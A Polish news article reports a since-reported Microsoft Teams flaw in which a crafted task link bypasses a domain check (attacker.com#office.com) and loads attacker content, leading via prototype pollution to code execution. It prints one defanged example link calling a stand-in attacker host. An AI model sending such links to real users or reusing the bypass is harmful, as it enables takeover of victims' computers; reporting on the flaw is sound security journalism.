Problem z Microsoft Teams. Otwierasz link i tracisz wszystko

Microsoft Teams
Microsoft Teams
Źródło zdjęć: © WP | Oskar Ziomek

25.01.2023 07:20, aktual.: 25.01.2023 08:18

Zalogowani mogą więcej

Możesz zapisać ten artykuł na później. Znajdziesz go potem na swoim koncie użytkownika

Nawet aplikacje dostarczane przez branżowych gigantów mogą mieć proste podatności. Taka sytuacja dotyczy Microsoft Teams. Popularne w firmach oprogramowanie miało ogromną lukę, która pozwalała przestępcom na przejęcie kontroli nad komputerem ofiary.

Wystarczy niewielkie niedopatrzenie twórców oprogramowania, by dać hakerom okazję do działania. Zdarza się to nawet w przypadku popularnych aplikacji, które są dostarczane przez największe firmy technologiczne na rynku. Jedna z takich niebezpiecznych podatności została wykryta w Microsoft Teams.

Opis podatności Microsoft Teams możemy przeczytać w serwisie sekurak.pl. Dowiemy się stamtąd, że pozwala ona na uruchomienie pewnej funkcji w aplikacji, która ładuje treści z zewnętrznej strony internetowej (należącej do osoby, która dokonuje ataku) po otwarciu przesłanego przez Teams specjalnie przygotowanego linku. Poniżej prezentujemy przykładowy format linku, który mógłby zadziałać w przypadku tego typu ataku:

[https://]teams[.]live[.]com/_#/l/task/1ded03cb-ece5-4e7c-9f73-61c375528078?url=[https://]attacker[.]com%23[.]office[.]com/&height=100&width=100&title=hey&fallbackURL=https://aka[.]ms/hey&completionBotId=1&fqdn=teams[.]live[.]com

Dalsza część artykułu pod materiałem wideo

W teorii Microsoft Teams powinien akceptować tego typu odnośnik tylko wówczas, gdy prowadzi do domeny office.com. W tym przypadku cyberprzestępcom udało się w łatwy sposób ominąć sprawdzenie tego faktu, przez użycie adresu: https[://]attacker[.]com#office[.]com.

To doprowadza do sytuacji, w której możliwe jest załadowanie dowolnej zawartości ze strony cyberprzestępcy, przy wykorzystaniu luki klasy prototype pollution. Umożliwia to wykonanie kodu na komputerze ofiary, który to w zależności od wizji atakującego może realizować różne funkcje, w tym nawet przejmować dostęp do urządzenia.

Jak czytamy w serwisie sekurak.pl, podatność ta prawdopodobnie została już załatana. Została ona bowiem zgłoszona do konkursu Pwn2Own Vancouver 2022.

Karol Kołtowski, dziennikarz dobreprogramy.pl

Jesteś świadkiem próby oszustwa?Poinformuj nas o tym zdarzeniu!

Programy

Zobacz więcej
Oceń jakość naszego artykułuTwoja opinia pozwala nam tworzyć lepsze treści.
Wybrane dla Ciebie
Komentarze (26)